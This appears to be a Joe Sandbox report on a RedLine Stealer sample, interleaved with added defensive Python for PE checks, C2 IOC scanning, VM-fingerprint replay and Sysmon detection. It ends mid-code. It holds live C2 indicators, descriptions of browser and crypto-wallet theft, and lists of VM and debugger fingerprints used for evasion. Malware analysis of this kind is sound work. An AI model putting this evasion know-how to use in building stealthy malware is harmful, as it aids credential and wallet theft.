ID: 453870 / Sample Name: Syndicate.exe / Cookbook: default.jbs / Time: 11:45:12 / Date: 25/07/2021 / Version: 33.0.0 White Diamond
Table of Contents
Windows Analysis Report Syndicate.exe
Overview: General Information, Detection, Signatures, Classification
Process Tree
Malware Configuration: Threatname: RedLine
Yara Overview: PCAP (Network Traffic), Memory Dumps, Unpacked PEs
Sigma Overview
Jbx Signature Overview: AV Detection, Networking, System Summary, Data Obfuscation, Hooking and other Techniques for Hiding and Protection, Malware Analysis System Evasion, Anti Debugging, Stealing of Sensitive Information, Remote Access Functionality
Mitre Att&ck Matrix
Behavior Graph
Screenshots: Thumbnails
Antivirus, Machine Learning and Genetic Malware Detection: Initial Sample, Dropped Files, Unpacked PE Files, Domains, URLs
Domains and IPs: Contacted Domains, Contacted URLs, URLs from Memory and Binaries, Contacted IPs (Public, Private)
General Information
Simulations: Behavior and APIs
Joe Sandbox View / Context: IPs, Domains, ASN, JA3 Fingerprints, Dropped Files
Created / dropped Files
Static File Info: General, File Icon
Static PE Info: General, Authenticode Signature, Entrypoint Preview, Data Directories, Sections, Resources, Imports, Version Infos, Possible Origin
Network Behavior: Network Port Distribution, TCP Packets, UDP Packets, DNS Queries, DNS Answers, HTTP Request Dependency Graph, HTTP Packets
Code Manipulations
Statistics: Behavior
System Behavior
Analysis Process: Syndicate.exe PID: 4900 Parent PID: 5696 (General; File Activities: File Created, File Deleted, File Written, File Read; Registry Activities)
Analysis Process: conhost.exe PID: 4196 Parent PID: 4900 (General)
Analysis Process: GameBarPresenceWriter.exe PID: 5920 Parent PID: 792 (General; Registry Activities: Key Created)
Analysis Process: GameBar.exe PID: 5572 Parent PID: 792 (General; Registry Activities)
Disassembly: Code Analysis
Copyright Joe Security LLC 2021 Page 2 of 27
Windows Analysis Report Syndicate.exe
Overview
General Information
Sample Name: Syndicate.exe
Analysis ID: 453870
MD5: 1ca3d04a1c28f57…
SHA1: 30a0a21660c49c…
SHA256: 196e6323c5ffd21…
Tags: exe
Detection
Threat name: RedLine
Score: 100 (range: 0 - 100)
Whitelisted: false
Confidence: 100%
Signatures
Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected RedLine Stealer
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses known network protocols on non-standard ports
AV process strings found (often use…
Binary contains a suspicious time st…
Checks if Antivirus/Antispyware/Fire…
Checks if the current process is bein…
Contains capabilities to detect virtua…
Contains long sleeps (>= 3 min)
Detected TCP or UDP traffic on non…
Detected potential crypto function
Enables debug privileges
Entry point lies outside standard sec…
Found a high number of Window / Us…
HTTP GET or POST without a user…
IP address seen in connection with o…
Internet Provider seen in connection…
Is looking for software installed on th…
May sleep (evasive loops) to hinder…
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains sections with non-s…
Queries sensitive processor informa…
Queries the volume information (nam…
Sample file is different than original…
Uses 32bit PE files
Uses code obfuscation techniques (…
Yara detected Credential Stealer
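Several of the static signatures in the list above (Uses 32bit PE files, PE file contains an invalid checksum, PE file contains section with special chars, Entry point lies outside standard sec…, Detected unpacking (changes PE section rights)) are plain header checks that an analyst can reproduce without the sandbox. The following Python is an added example, not code from Joe Sandbox or from the report: it parses the PE headers with the standard library, recomputes the optional-header CheckSum, locates the section holding the entry point, flags section names with non-printable characters and writable-plus-executable sections, and runs those checks over three PE32 images constructed inline (a clean one, one with a byte patched after the checksum was set, and one with an oddly named RWX section holding the entry point). The set of "standard" code section names and the finding texts are my assumptions; the report does not print the lists Joe Sandbox uses.

```python
import re
import struct

# Assumption: section names a compiler normally puts the entry point in.
STANDARD_CODE_SECTIONS = {".text", "CODE", ".code", ".itext", ".init", "INIT"}
SECTION_NAME_OK = re.compile(r"^[A-Za-z0-9._$@-]{1,8}$")
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000


def pe_checksum(data, checksum_offset):
    """Recompute OptionalHeader.CheckSum the way imagehlp's CheckSumMappedFile does."""
    padded = data + b"\0" * (-len(data) % 4)
    total = 0
    for off in range(0, len(padded), 4):
        if off == checksum_offset:          # the CheckSum field itself is skipped
            continue
        total += struct.unpack_from("<I", padded, off)[0]
        if total >= 1 << 32:
            total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total += total >> 16
    return (total & 0xFFFF) + len(data)


def parse_pe(data):
    """Pull out the header fields the checks need (offsets are shared by PE32 and PE32+)."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ file")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    nsec = struct.unpack_from("<H", data, e_lfanew + 6)[0]
    size_opt = struct.unpack_from("<H", data, e_lfanew + 20)[0]
    opt = e_lfanew + 24
    magic = struct.unpack_from("<H", data, opt)[0]
    entry = struct.unpack_from("<I", data, opt + 16)[0]
    checksum = struct.unpack_from("<I", data, opt + 64)[0]
    sections = []
    for i in range(nsec):
        name, vsize, va, rawsize, _, _, _, _, _, chars = struct.unpack_from(
            "<8sIIIIIIHHI", data, opt + size_opt + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode("latin-1"),
                         "va": va, "size": max(vsize, rawsize), "chars": chars})
    return {"pe32": magic == 0x10B, "entry": entry, "checksum": checksum,
            "checksum_offset": opt + 64, "sections": sections}


def static_checks(data):
    """Reproduce a few of the report's static signatures; returns a list of finding strings."""
    pe = parse_pe(data)
    findings = ["Uses 32bit PE files"] if pe["pe32"] else []
    if pe["checksum"] == 0:
        findings.append("PE checksum not set")
    elif pe["checksum"] != pe_checksum(data, pe["checksum_offset"]):
        findings.append("PE file contains an invalid checksum")
    holder = next((s for s in pe["sections"] if s["va"] <= pe["entry"] < s["va"] + s["size"]), None)
    if holder is None or holder["name"] not in STANDARD_CODE_SECTIONS:
        findings.append("Entry point lies outside standard sections (in %s)"
                        % (holder["name"] if holder else "no section"))
    for s in pe["sections"]:
        if not SECTION_NAME_OK.match(s["name"]):
            findings.append("PE file contains section with special chars (%r)" % s["name"])
        if s["chars"] & IMAGE_SCN_MEM_EXECUTE and s["chars"] & IMAGE_SCN_MEM_WRITE:
            findings.append("Writable and executable section (%s), as left by in-place unpacking" % s["name"])
    return findings


def build_pe32(entry_rva, section_names, set_checksum=True, rwx_last=False):
    """Constructed minimal PE32 (headers plus 0x200-byte sections of RET); not a runnable program."""
    nsec, e_lfanew = len(section_names), 0x40
    dos = bytearray(e_lfanew)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x14C, nsec, 0, 0, 0, 0xE0, 0x0102)   # i386, SizeOfOptionalHeader 0xE0
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)                                 # PE32 magic
    struct.pack_into("<I", opt, 16, entry_rva)                            # AddressOfEntryPoint
    struct.pack_into("<III", opt, 28, 0x400000, 0x1000, 0x200)            # ImageBase, SectionAlignment, FileAlignment
    struct.pack_into("<II", opt, 56, 0x1000 * (nsec + 1), 0x200)          # SizeOfImage, SizeOfHeaders
    struct.pack_into("<H", opt, 68, 2)                                    # Subsystem: Windows GUI
    struct.pack_into("<I", opt, 92, 16)                                   # NumberOfRvaAndSizes
    hdrs = b""
    for i, name in enumerate(section_names):
        chars = 0x60000020                                                # CODE | EXECUTE | READ
        if rwx_last and i == nsec - 1:
            chars |= IMAGE_SCN_MEM_WRITE
        hdrs += struct.pack("<8sIIIIIIHHI", name, 0x200, 0x1000 * (i + 1), 0x200, 0x200 * (i + 1), 0, 0, 0, 0, chars)
    image = bytearray(dos + b"PE\0\0" + coff + opt + hdrs)
    image += b"\0" * (0x200 - len(image)) + b"\xC3" * (0x200 * nsec)
    if set_checksum:
        struct.pack_into("<I", image, e_lfanew + 24 + 64, pe_checksum(bytes(image), e_lfanew + 24 + 64))
    return bytes(image)


CLEAN = build_pe32(0x1000, [b".text", b".rdata"])
TAMPERED = CLEAN[:-1] + b"\x90"            # one patched byte, CheckSum left stale
SUSPICIOUS = build_pe32(0x2000, [b".text", b"\x01\x02ab\x7f"], set_checksum=False, rwx_last=True)

if __name__ == "__main__":
    for label, blob in (("clean", CLEAN), ("tampered", TAMPERED), ("suspicious", SUSPICIOUS)):
        print(label, static_checks(blob))
```

A zero CheckSum is reported separately from a wrong one: unsigned binaries routinely ship with the field unset, whereas a non-zero value that does not match the image means the file was modified after linking (or the header was copied from another build), which is closer to what the report's "invalid checksum" signature is pointing at.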
Classification
Radar chart (image in the original report) rating the sample on a clean / suspicious / malicious scale across the categories Ransomware, Spreading, Phishing, Banker, Trojan / Bot, Adware, Spyware, Exploiter, Evader and Miner.
Process Tree
System is w10x64
Syndicate.exe (PID: 4900 cmdline: 'C:\Users\user\Desktop\Syndicate.exe' MD5: 1CA3D04A1C28F573E0A31C49881C8C4A)
  conhost.exe (PID: 4196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
GameBarPresenceWriter.exe (PID: 5920 cmdline: 'C:\Windows\System32\GameBarPresenceWriter.exe' -ServerName:Windows.Gaming.GameBar.Internal.PresenceWriterServer MD5: 04FC9C82E4D082B728D3337D75043690)
GameBar.exe (PID: 5572 cmdline: 'C:\Program Files\WindowsApps\Microsoft.XboxGamingOverlay_1.15.1001.0_x64__8wekyb3d8bbwe\GameBar.exe' -ServerName:App.AppXbdkk0yrkwpcgeaem8zk81k8py1eaahny.mca MD5: 754FD02CE495D5A4C90D6539727319EA)
cleanup
Malware Configuration
Threatname: RedLine
{
"C2 url": [
"65.21.103.71:56458"
],
"Bot Id": "fs3"
}
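The configuration block above gives the command-and-control endpoint as host:port plus a bot identifier, and the URLs table later in this report lists the strings tempuri.org/Endpoint/CheckConnect, SetEnvironment, EnvironmentSettings, GetUpdates and VerifyUpdate (with their ...Response counterparts), which is how the operation names of a .NET WCF service contract appear when the developer keeps the default namespace. The following Python is an added example and is not code from the report or from the RedLine client: it normalises the configuration into IOCs, then scans a memory dump for those operation names and for host:port literals so an analyst can confirm that a dump corroborates the extracted C2. The memory bytes are constructed inline, the function names are mine, and the UTF-16LE search is an assumption about how a .NET binary stores its string literals (the #US heap); ASCII is searched as well because network buffers are usually narrow strings.

```python
import ipaddress
import json
import re

# Operation names as listed in this report's URLs table.
REDLINE_ACTIONS = (
    "tempuri.org/Endpoint/CheckConnect",
    "tempuri.org/Endpoint/SetEnvironment",
    "tempuri.org/Endpoint/EnvironmentSettings",
    "tempuri.org/Endpoint/GetUpdates",
    "tempuri.org/Endpoint/VerifyUpdate",
)
# host:port as it appears in the "C2 url" field, e.g. 65.21.103.71:56458, in ASCII and UTF-16LE.
HOST_PORT_RE = re.compile(rb"(?:\d{1,3}\.){3}\d{1,3}:\d{2,5}")
HOST_PORT_WIDE_RE = re.compile(rb"(?:\d\x00){1,3}(?:\.\x00(?:\d\x00){1,3}){3}:\x00(?:\d\x00){2,5}")


def iocs_from_config(config_json):
    """Turn the sandbox's extracted configuration into {"c2": [(host, port, is_ip)], "bot_id": str}."""
    cfg = json.loads(config_json)
    c2s = []
    for entry in cfg.get("C2 url", []):
        host, sep, port = entry.rpartition(":")
        if not sep or not port.isdigit():
            raise ValueError("C2 entry is not host:port: %r" % entry)
        try:
            ipaddress.ip_address(host)
            is_ip = True
        except ValueError:
            is_ip = False          # a domain rather than a literal address
        c2s.append((host, int(port), is_ip))
    return {"c2": c2s, "bot_id": cfg.get("Bot Id", "")}


def scan_dump(blob):
    """Find RedLine operation names and host:port literals in a memory dump (ASCII and UTF-16LE)."""
    hits = {"actions": set(), "host_ports": set()}
    for action in REDLINE_ACTIONS:
        if action.encode("ascii") in blob or action.encode("utf-16-le") in blob:
            hits["actions"].add(action)
    for m in HOST_PORT_RE.finditer(blob):
        hits["host_ports"].add(m.group().decode("ascii"))
    for m in HOST_PORT_WIDE_RE.finditer(blob):
        hits["host_ports"].add(m.group().decode("utf-16-le"))
    return hits


def triage(config_json, blob):
    """Combine both sources: does the dump corroborate the extracted C2, and what else does it name?"""
    ioc = iocs_from_config(config_json)
    hits = scan_dump(blob)
    expected = {"%s:%d" % (host, port) for host, port, _ in ioc["c2"]}
    return {
        "bot_id": ioc["bot_id"],
        "c2": sorted(expected),
        "c2_seen_in_dump": sorted(expected & hits["host_ports"]),
        "actions_seen": sorted(hits["actions"]),
        "other_host_ports": sorted(hits["host_ports"] - expected),
    }


# Constructed sample input: the configuration as printed in this report, and a synthetic
# dump holding two UTF-16LE .NET literals, the C2 as a wide string and the same C2 as ASCII.
SAMPLE_CONFIG = '{"C2 url": ["65.21.103.71:56458"], "Bot Id": "fs3"}'
SAMPLE_DUMP = (
    b"\x00" * 16
    + "tempuri.org/Endpoint/CheckConnect".encode("utf-16-le") + b"\x00\x00"
    + "tempuri.org/Endpoint/SetEnvironment".encode("utf-16-le") + b"\x00\x00"
    + "65.21.103.71:56458".encode("utf-16-le") + b"\x00" * 8
    + b"65.21.103.71:56458/" + b"\x00" * 16
)

if __name__ == "__main__":
    print(json.dumps(triage(SAMPLE_CONFIG, SAMPLE_DUMP), indent=2))
```

Anything that lands in other_host_ports is worth a look: a second host:port next to the operation names usually means a fallback endpoint the configuration extractor did not pick up.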
Yara Overview
PCAP (Network Traffic)
Source | Rule | Description | Author
dump.pcap | JoeSecurity_RedLine_1 | Yara detected RedLine Stealer | Joe Security
Memory Dumps
Source | Rule | Description | Author
00000001.00000003.200580397.0000000001C70000.00000004.00000001.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
Process Memory Space: Syndicate.exe PID: 4900 | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
Process Memory Space: Syndicate.exe PID: 4900 | JoeSecurity_RedLine_1 | Yara detected RedLine Stealer | Joe Security
Process Memory Space: Syndicate.exe PID: 4900 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
Unpacked PEs
Source | Rule | Description | Author
1.2.Syndicate.exe.ca0000.0.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
Sigma Overview
No Sigma rule has matched
Jbx Signature Overview
AV Detection:
Antivirus / Scanner detection for submitted sample
Found malware configuration
Multi AV Scanner detection for submitted file
Machine Learning detection for sample
Networking:
Uses known network protocols on non-standard ports
System Summary:
PE file contains section with special chars
Data Obfuscation:
Detected unpacking (changes PE section rights)
Hooking and other Techniques for Hiding and Protection:
Uses known network protocols on non-standard ports
Malware Analysis System Evasion:
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Anti Debugging:
Hides threads from debuggers
Tries to detect sandboxes and other dynamic analysis tools (window names)
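The Malware Analysis System Evasion and Anti Debugging signatures above name the data sources this sample consults (Win32_DiskDrive, Win32_VideoController, the firmware table, the registry and window names) but not the values it compares them against, which Joe Sandbox does not print in this report. The following Python is an added example, not code from the report or from the sample: it replays that style of check against constructed host descriptions so a sandbox oper`ator can see which artefacts give an analysis VM away before a stealer like this one decides whether to run. The indicator strings, registry keys and window-title words are assumptions drawn from commonly documented VM and debugger fingerprints, not values recovered from this sample, and the two host descriptions are made up.

```python
import re

# Assumed indicators; tune them to the fingerprints your own sandbox image exposes.
VM_DISK_MODELS = ("VBOX", "VMWARE", "QEMU", "VIRTUAL", "XEN")
VM_VIDEO_NAMES = ("VMWARE", "VIRTUALBOX", "VBOX", "QXL", "HYPER-V", "RED HAT")
VM_FIRMWARE_STRINGS = (b"VirtualBox", b"VMware", b"QEMU", b"Xen", b"innotek", b"Parallels", b"BOCHS")
SANDBOX_REG_KEYS = (
    r"HKLM\SYSTEM\CurrentControlSet\Services\VBoxGuest",
    r"HKLM\SYSTEM\CurrentControlSet\Services\VBoxSF",
    r"HKLM\SOFTWARE\VMware, Inc.\VMware Tools",
    r"HKLM\HARDWARE\ACPI\DSDT\VBOX__",
)
ANALYSIS_WINDOW_RE = re.compile(
    r"\b(ollydbg|x64dbg|x32dbg|ida|windbg|wireshark|procmon|process monitor|process hacker|fiddler)\b",
    re.IGNORECASE)


def evasion_checks(host):
    """Replay the checks behind the signatures above against a host description.

    `host` holds what such code would read: Win32_DiskDrive.Model values,
    Win32_VideoController.Name values, the raw SMBIOS firmware table, the
    registry keys that exist and the titles of top-level windows. Returns
    (check, evidence) pairs; an empty list means nothing gave the host away.
    """
    findings = []
    for model in host.get("disk_models", []):
        if any(tag in model.upper() for tag in VM_DISK_MODELS):
            findings.append(("wmi:Win32_DiskDrive", model))
    for name in host.get("video_controllers", []):
        if any(tag in name.upper() for tag in VM_VIDEO_NAMES):
            findings.append(("wmi:Win32_VideoController", name))
    smbios = host.get("smbios", b"")
    for needle in VM_FIRMWARE_STRINGS:
        if needle in smbios:
            findings.append(("firmware:SMBIOS", needle.decode("ascii")))
    present = {key.lower() for key in host.get("registry_keys", [])}
    for key in SANDBOX_REG_KEYS:
        if key.lower() in present:
            findings.append(("registry", key))
    for title in host.get("window_titles", []):
        if ANALYSIS_WINDOW_RE.search(title):
            findings.append(("window", title))
    return findings


def fired(host):
    """Only the data sources that fired, for comparing two images side by side."""
    return sorted({check for check, _ in evasion_checks(host)})


# Constructed host descriptions: a stock VirtualBox analysis VM with Wireshark open,
# and a physical workstation. Neither is taken from the report.
ANALYSIS_VM = {
    "disk_models": ["VBOX HARDDISK ATA Device"],
    "video_controllers": ["VirtualBox Graphics Adapter"],
    "smbios": b"\x00innotek GmbH\x00VirtualBox\x001.2\x00",
    "registry_keys": [r"HKLM\SYSTEM\CurrentControlSet\Services\VBoxGuest"],
    "window_titles": ["Wireshark - Capturing from Ethernet", "Syndicate.exe"],
}
BARE_METAL = {
    "disk_models": ["Samsung SSD 870 EVO 1TB"],
    "video_controllers": ["NVIDIA GeForce GTX 1660"],
    "smbios": b"\x00Dell Inc.\x00OptiPlex 7080\x00",
    "registry_keys": [],
    "window_titles": ["Syndicate.exe", "Program Manager"],
}

if __name__ == "__main__":
    for label, host in (("analysis VM", ANALYSIS_VM), ("bare metal", BARE_METAL)):
        print(label, evasion_checks(host))
```

Feeding the script the real WMI, SMBIOS, registry and window-list output of a sandbox image (for example via Get-CimInstance and Get-ItemProperty) lists exactly the artefacts that image should mask; the report's Analysis stop reason: Timeout together with the 53 modified Sleep calls under Simulations is what an analysis looks like when such checks are only partly defeated.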
Stealing of Sensitive Information:
Yara detected RedLine Stealer
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Remote Access Functionality:
Yara detected RedLine Stealer
Mitre Att&ck Matrix
Techniques matched by this sample's signatures, grouped by tactic (the numbers are the per-technique signature counts shown in the matrix):
Execution: Windows Management Instrumentation (2, 2, 1)
Privilege Escalation: Process Injection (2)
Defense Evasion: Masquerading (1); Disable or Modify Tools (1); Virtualization/Sandbox Evasion (5, 5, 1); Process Injection (2); Obfuscated Files or Information (2); Software Packing (1, 2); Timestomp (1)
Credential Access: OS Credential Dumping (1)
Discovery: Security Software Discovery (6, 5); Process Discovery (1, 2); Virtualization/Sandbox Evasion (5, 5, 1); Application Window Discovery (1); Remote System Discovery (1); System Information Discovery (1, 2, 4)
Collection: Archive Collected Data (1); Data from Local System (2)
Command and Control: Encrypted Channel (1); Non-Standard Port (1, 1); Non-Application Layer Protocol (2); Application Layer Protocol (2)
No technique was matched under Initial Access, Persistence, Lateral Movement, Exfiltration or Network Effects.
Behavior Graph
ID: 453870; Sample: Syndicate.exe; Startdate: 25/07/2021; Architecture: WINDOWS; Score: 100
The graph is an image in the original report; its nodes as far as they survive in the text:
Process nodes (each reached by a "started" edge): Syndicate.exe, annotated 15 and 34 (the legend's counts of created registry values and created files); GameBar.exe, annotated 1; GameBarPresenceWriter.exe; conhost.exe
Signatures on Syndicate.exe: Found malware configuration; Antivirus / Scanner detection for submitted sample; Multi AV Scanner detection for submitted file; 5 other signatures
Network nodes: 65.21.103.71 (ports 49730, 49733, 56458; CP-ASDE, United States); api.ip.sb (unknown); 192.168.2.1 (unknown)
Dropped file: C:\Users\user\AppData\...\Syndicate.exe.log, ASCII
Further signatures: Detected unpacking (changes PE section rights); Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Query firmware table information (likely to detect VMs); 6 other signatures
Screenshots
Antivirus, Machine Learning and Genetic Malware Detection
Initial Sample
Source | Detection | Scanner | Label
Syndicate.exe | 30% | Virustotal |
Syndicate.exe | 100% | Avira | TR/Crypt.XPACK.Gen
Syndicate.exe | 100% | Joe Sandbox ML |
Dropped Files
No Antivirus matches
Unpacked PE Files
No Antivirus matches
Domains
Source | Detection | Scanner | Label
api.ip.sb | 2% | Virustotal |
URLs
Source | Detection | Scanner | Label
65.21.103.71: | 1% | Virustotal |
65.21.103.71: | 0% | Avira URL Cloud | safe
service.r | 0% | URL Reputation | safe
tempuri.org/t_ | 0% | Avira URL Cloud | safe
https://api.ip.sb/geoip | 0% | URL Reputation | safe
tempuri.org/ | 2% | Virustotal |
tempuri.org/ | 0% | Avira URL Cloud | safe
ns.adobe.c/g | 0% | URL Reputation | safe
tempuri.org/Endpoint/SetEnvironment | 0% | Avira URL Cloud | safe
tempuri.org/Endpoint/SetEnvironmentResponse | 0% | Avira URL Cloud | safe
www.sajatypeworks.com | 0% | URL Reputation | safe
tempuri.org/Endpoint/GetUpdates | 0% | Avira URL Cloud | safe
www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
www.interoperabilitybridges.com/wmp-extension-for-chrome | 0% | URL Reputation | safe
www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
tempuri.org/Endpoint/VerifyUpdate | 0% | Avira URL Cloud | safe
www.urwpp.deDPlease | 0% | URL Reputation | safe
www.zhongyicts.com.cn | 0% | URL Reputation | safe
support.a | 0% | URL Reputation | safe
65.21.103.71:56458/ | 0% | Avira URL Cloud | safe
ns.adobe.cobj | 0% | URL Reputation | safe
tempuri.org/Endpoint/CheckConnectResponse | 0% | Avira URL Cloud | safe
schemas.datacontract.org/2004/07/ | 0% | URL Reputation | safe
https://api.ip.sb/geoip%USERPEnvironmentROFILE% | 0% | URL Reputation | safe
65.21.103.71:56458 | 0% | Avira URL Cloud | safe
65.21.103.71:564584 | 0% | Avira URL Cloud | safe
tempuri.org/Endpoint/SetEnviron | 0% | Avira URL Cloud | safe
www.carterandcone.coml | 0% | URL Reputation | safe
forms.rea | 0% | URL Reputation | safe
tempuri.org/Endpoint/EnvironmentSettingsResponse | 0% | Avira URL Cloud | safe
www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
ocsp.sectigo.com0 | 0% | URL Reputation | safe
tempuri.org/Endpoint/EnvironmentSettings | 0% | Avira URL Cloud | safe
www.tiro.com | 0% | URL Reputation | safe
www.goodfont.co.kr | 0% | URL Reputation | safe
tempuri.org/Endpoint/VerifyUpdateResponse | 0% | Avira URL Cloud | safe
go.micros | 0% | URL Reputation | safe
https://sectigo.com/CPS0U | 0% | URL Reputation | safe
www.typography.netD | 0% | URL Reputation | safe
www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
fontfabrik.com | 0% | URL Reputation | safe
https://api.ipify.orgcookies//settinString.Removeg | 0% | URL Reputation | safe
https://sectigo.com/CPS0D | 0% | URL Reputation | safe
tempuri.org/0 | 0% | Avira URL Cloud | safe
www.sandoll.co.kr | 0% | URL Reputation | safe
www.sakkal.com | 0% | URL Reputation | safe
https://api.ip.sb4 | 0% | URL Reputation | safe
https://helpx.ad | 0% | URL Reputation | safe
tempuri.org/Endpoint/CheckConnect | 0% | Avira URL Cloud | safe
https://get.adob | 0% | URL Reputation | safe
crl.sectigo.com/SectigoRSATimeStampingCA.crl0t | 0% | URL Reputation | safe
www.founder.com.cn/cn | 0% | URL Reputation | safe
crt.sectigo.com/SectigoRSATimeStampingCA.crt0# | 0% | URL Reputation | safe
tempuri.org/Endpoint/GetUpdatesResponse | 0% | Avira URL Cloud | safe
www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
ns.ado/1 | 0% | URL Reputation | safe
General Information
Joe Sandbox Version: 33.0.0 White Diamond
Analysis ID: 453870
Start date: 25.07.2021
Start time: 11:45:12
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 6m 43s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: Syndicate.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 27
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies: HCA enabled; EGA enabled; HDC enabled; AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@4/29@2/2
EGA Information: Failed
HDC Information: Failed
HCA Information: Failed
Cookbook Comments: Adjust boot time; Enable AMSI; Found application associated with file extension: .exe
Warnings: none
Domains and IPs
Contacted Domains
Name | IP | Active | Malicious | Antivirus Detection | Reputation
api.ip.sb | unknown | unknown | true | 2%, Virustotal | unknown
Contacted URLs
Name | Malicious | Antivirus Detection | Reputation
65.21.103.71:56458/ | true | Avira URL Cloud: safe | unknown
URLs from Memory and Binaries
(table not expanded in this report)
Contacted IPs
Public
IP | Domain | Country | ASN | ASN Name | Malicious
65.21.103.71 | unknown | United States | 199592 | CP-ASDE | true
Private
192.168.2.1
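The Contacted IPs table above shows a single public endpoint, 65.21.103.71 on port 56458 (AS 199592, CP-ASDE), reached more than once from Syndicate.exe (the ephemeral ports 49730 and 49733 listed next to it in the behavior graph), which is the traffic behind the "Uses known network protocols on non-standard ports" signature. The following Python is an added example and not part of the report: it turns that observation into a detection over Sysmon Event ID 3 (network connection) records, alerting on the known C2 pair from the malware configuration and, more generally, on outbound TCP to a non-standard port from an image outside the trusted system directories, and it counts the repeated connections per destination. The records are constructed here to mirror the report's process tree and network summary (the field names are Sysmon's own), the standard-port allow-list and trusted-directory list are assumptions to tune per environment, and the address used for the api.ip.sb lookup is an RFC 5737 documentation address, not the real one.

```python
import json
from collections import defaultdict

# C2 endpoint taken from this report's malware configuration.
KNOWN_C2 = {("65.21.103.71", 56458)}
# Assumptions to tune per environment: ports where a well-known protocol is expected,
# and image directories whose binaries are not treated as user-dropped.
STANDARD_PORTS = {21, 22, 25, 53, 80, 110, 123, 143, 443, 465, 587, 993, 995, 3389}
TRUSTED_IMAGE_PREFIXES = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")


def from_user_writable_path(image):
    """True when the process image does not live under a trusted system directory."""
    return not image.lower().startswith(TRUSTED_IMAGE_PREFIXES)


def detect(sysmon_jsonl):
    """Group Sysmon Event ID 3 records per (image, destination) and raise alerts.

    Rules: known RedLine C2 from the configuration, and outbound TCP to a
    non-standard port from a user-writable image path. Each alert carries
    the number of connections and the source ports, which is what the
    behavior graph's port list is showing.
    """
    groups = defaultdict(list)
    for line in sysmon_jsonl.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        if ev.get("EventID") != 3 or not ev.get("Initiated", False):
            continue                                   # only outbound connections
        key = (ev["Image"], ev["DestinationIp"], int(ev["DestinationPort"]), ev["Protocol"].lower())
        groups[key].append(int(ev["SourcePort"]))
    alerts = []
    for (image, dst_ip, dst_port, proto), sports in sorted(groups.items()):
        rules = []
        if (dst_ip, dst_port) in KNOWN_C2:
            rules.append("known_redline_c2")
        if proto == "tcp" and dst_port not in STANDARD_PORTS and from_user_writable_path(image):
            rules.append("nonstandard_port_from_user_path")
        if rules:
            alerts.append({"image": image, "dst": "%s:%d" % (dst_ip, dst_port), "rules": rules,
                           "connections": len(sports), "source_ports": sorted(sports)})
    return alerts


# Constructed records (JSON form of Sysmon Event ID 3) mirroring this report: two
# connections from Syndicate.exe to the C2, its api.ip.sb lookup, a DNS query from
# svchost.exe and a TLS connection from GameBar.exe. Host address and the svchost PID are made up.
SAMPLE_EVENTS = r"""
{"EventID": 3, "Image": "C:\\Users\\user\\Desktop\\Syndicate.exe", "ProcessId": 4900, "Protocol": "tcp", "Initiated": true, "SourceIp": "192.168.2.22", "SourcePort": 49730, "DestinationIp": "65.21.103.71", "DestinationPort": 56458}
{"EventID": 3, "Image": "C:\\Users\\user\\Desktop\\Syndicate.exe", "ProcessId": 4900, "Protocol": "tcp", "Initiated": true, "SourceIp": "192.168.2.22", "SourcePort": 49733, "DestinationIp": "65.21.103.71", "DestinationPort": 56458}
{"EventID": 3, "Image": "C:\\Users\\user\\Desktop\\Syndicate.exe", "ProcessId": 4900, "Protocol": "tcp", "Initiated": true, "SourceIp": "192.168.2.22", "SourcePort": 49731, "DestinationIp": "203.0.113.10", "DestinationHostname": "api.ip.sb", "DestinationPort": 443}
{"EventID": 3, "Image": "C:\\Windows\\System32\\svchost.exe", "ProcessId": 1234, "Protocol": "udp", "Initiated": true, "SourceIp": "192.168.2.22", "SourcePort": 61000, "DestinationIp": "192.168.2.1", "DestinationPort": 53}
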